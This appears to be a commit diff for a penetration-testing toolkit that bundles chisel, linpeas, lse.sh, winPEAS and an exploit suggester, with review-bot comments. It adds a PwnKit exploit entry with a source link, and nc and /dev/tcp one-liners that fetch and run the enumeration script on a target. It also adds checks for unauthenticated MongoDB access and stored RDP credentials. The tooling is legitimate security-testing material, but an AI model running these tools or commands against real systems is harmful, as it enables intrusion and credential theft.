Project Update
parent
f640b45acf
commit
1f55516c59
BIN
chisel64
BIN
chisel64
Binary file not shown.
@ -347,7 +347,7 @@ containerCheck() {
|
||||
# Are we inside kubenetes?
|
||||
if grep "/kubepod" /proc/1/cgroup -qa; then
|
||||
inContainer="1"
|
||||
containerType="kubentes"
|
||||
containerType="kubernetes"
|
||||
fi
|
||||
|
||||
# Are we inside LXC?
|
||||
|
@ -86,6 +86,8 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
||||
if path in self.server.dumpRequests:
|
||||
headers["Access-Control-Allow-Origin"] = "*"
|
||||
|
||||
headers["Content-Length"] = len(data)
|
||||
|
||||
if len(headers) == 0:
|
||||
self.send_response(status_code)
|
||||
else:
|
||||
@ -149,11 +151,14 @@ class HttpFileServer(HTTPServer):
|
||||
if isinstance(data, str):
|
||||
data = data.encode("UTF-8")
|
||||
|
||||
# return 200 - OK and data
|
||||
headers = {
|
||||
"Access-Control-Allow-Origin": "*",
|
||||
}
|
||||
if mimeType:
|
||||
self.addRoute(name, lambda req: (200, data, { "Content-Type": mimeType }))
|
||||
else:
|
||||
self.addRoute(name, lambda req: (200, data))
|
||||
headers["Content-Type"] = headers
|
||||
|
||||
# return 200 - OK and data
|
||||
self.addRoute(name, lambda req: (200, data, headers))
|
||||
|
||||
def dumpRequest(self, name):
|
||||
self.dumpRequests.append(self.cleanPath(name))
|
||||
|
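Review bot: In the second hunk (the `HttpFileServer` method that registers a static route), `headers["Content-Type"] = headers` stores the dict inside itself instead of the MIME type, so a file registered with a `mimeType` would be served with the string form of a dict as its content type; it should read `headers["Content-Type"] = mimeType`. The same `headers` dict is captured by the lambda and handed back on every request, and the handler in the first hunk appears to write `Content-Length` (and the CORS header for dumped paths) into whatever dict the route returned, so returning `dict(headers)` from the lambda would keep per-request changes out of the shared object. `len(data)` in the first hunk is a correct `Content-Length` only when `data` is bytes; routes that return a str or `None` are not visible here and should be checked. Both method bodies start outside the hunks.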
3905
linpeas.sh
Executable file → Normal file
3905
linpeas.sh
Executable file → Normal file
File diff suppressed because one or more lines are too long
@ -1490,6 +1490,17 @@ exploit-db: https://www.exploit-db.com/exploits/41154
|
||||
EOF
|
||||
)
|
||||
|
||||
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
|
||||
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
|
||||
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
|
||||
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
|
||||
Rank: 1
|
||||
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
|
||||
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
|
||||
author: berdav
|
||||
EOF
|
||||
)
|
||||
|
||||
###########################################################
|
||||
## security related HW/kernel features
|
||||
###########################################################
|
||||
|
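Review bot: The requirement `Reqs: pkg=polkit|policykit-1,ver<=0.105-31` in the new PwnKit entry looks too narrow for the distributions named in `Tags:`. The linked Qualys advisory describes the flaw as present in pkexec since its first release, and distributions such as Fedora and Manjaro package polkit under upstream version numbers above 0.105, so an audit run there would likely report an unpatched host as unaffected. In the other direction, a patched distribution build whose version string still sorts at or below `0.105-31` would be flagged as vulnerable, depending on how the script compares versions. A comment above the entry stating which package builds the bound was derived from would let the next maintainer verify it.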
10
lse.sh
10
lse.sh
@ -5,7 +5,7 @@
|
||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||
#
|
||||
lse_version="3.7"
|
||||
lse_version="3.9"
|
||||
|
||||
#( Colors
|
||||
#
|
||||
@ -502,7 +502,8 @@ lse_serve() {
|
||||
cecho "${green} * ${white}wget ${reset} '$ip:$port' -O lse.sh; chmod 755 lse.sh\n"
|
||||
cecho "${green} * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n"
|
||||
done
|
||||
nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
|
||||
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||
}
|
||||
lse_header() {
|
||||
local id="$1"
|
||||
@ -1262,6 +1263,11 @@ lse_run_tests_software() {
|
||||
"Can we write to screen session sockets from other users?" \
|
||||
'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +'
|
||||
|
||||
#check connection to mongoDB
|
||||
lse_test "sof170" "1" \
|
||||
"Can we access MongoDB databases without credentials?" \
|
||||
'echo "show dbs" | mongo --quiet | grep -E "(admin|config|local)"'
|
||||
|
||||
#sudo version - check to see if there are any known vulnerabilities with this
|
||||
lse_test "sof500" "2" \
|
||||
"Sudo version" \
|
||||
|
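Review bot: The new `sof170` test pipes `show dbs` into `mongo`, and a missing `mongo` binary produces the same empty result as a server that enforces authentication, so the finding is silently missed on hosts that ship only the newer `mongosh` shell. Consider trying both, e.g. `'echo "show dbs" | { mongo --quiet 2>/dev/null || mongosh --quiet 2>/dev/null; } | grep -E "(admin|config|local)"'`, and bounding the connection attempt so an unreachable server cannot stall the run. In the `lse_serve` hunk the `||` chain falls through on any non-zero exit, not only on an unsupported flag, so a transfer that fails part-way reopens the listener with the next variant; the added comment should say so. Both function bodies continue outside the hunks.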
2
util.py
2
util.py
@ -193,7 +193,7 @@ if __name__ == "__main__":
|
||||
output = set_exif_data(payload, _in, _out, tag)
|
||||
sys.stdout.buffer.write(output)
|
||||
sys.stdout.flush()
|
||||
elif command == "help":
|
||||
else:
|
||||
print("Usage: %s [command]" % bin)
|
||||
print("Available commands:")
|
||||
print(" help, getAddress, pad, exifImage")
|
||||
|
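Review bot: With `elif command == "help":` replaced by `else:`, an unrecognised command now gets the usage text, but as far as the hunk shows it is printed to stdout and nothing sets a failing exit status, so a calling script cannot tell a mistyped command from a successful `help`. If no exit follows below the hunk, add `sys.exit(1)` after the usage lines for the non-`help` case. The name `bin` used in the usage line shadows the builtin of the same name; where it is assigned is outside the hunk.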
BIN
win/chisel.exe
BIN
win/chisel.exe
Binary file not shown.
BIN
win/chisel64.exe
BIN
win/chisel64.exe
Binary file not shown.
@ -237,7 +237,7 @@ CALL :T_Progress 2
|
||||
:RemodeDeskCredMgr
|
||||
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
|
||||
IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
|
||||
|
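Review bot: The replacement path `%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings` keeps the `\Local` segment from the old `%AppLocal%` form; `%LOCALAPPDATA%` normally already ends in `AppData\Local`, so the `IF exist` test would look under `...\Local\Local\...` and never fire. The test should probably read `IF exist "%LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"`. The `ECHO.Found:` text on the same line still prints `%AppLocal%`, which is not defined anywhere in this hunk, so the reported path should use the same variable as the test.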
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.